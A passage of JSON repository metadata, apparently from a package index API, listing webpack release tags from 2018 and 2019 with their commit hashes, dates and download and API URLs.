7:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2F